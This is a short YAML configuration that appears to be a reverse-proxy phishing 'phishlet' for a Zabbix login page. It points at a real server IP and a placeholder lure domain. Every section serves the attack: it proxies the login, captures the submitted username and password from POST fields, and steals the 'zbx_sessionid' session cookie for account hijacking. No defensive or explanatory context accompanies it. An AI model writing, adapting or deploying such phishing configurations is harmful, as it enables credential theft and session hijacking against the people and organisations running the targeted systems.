name: 'Zabbix Login'
author: 'Cristian'
min_ver: '3.0.0'

proxy_hosts:
  - {phish_sub: 'zabbix', orig_sub: '13.92.242.150', domain: 'zabbix.tudominio.com', session: true, is_landing: true, auto_filter: true}

auth_tokens:
  - domain: '13.92.242.150'
    keys: ['zbx_sessionid']
    type: 'cookie'

credentials:
  username:
    key: 'name'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

force_post:
  - path: '/index.php'
    search:
      - {key: 'name', search: '.*'}
      - {key: 'password', search: '.*'}
    force: []
    type: 'post'

login:
  domain: '13.92.242.150'
  path: 'index.php'
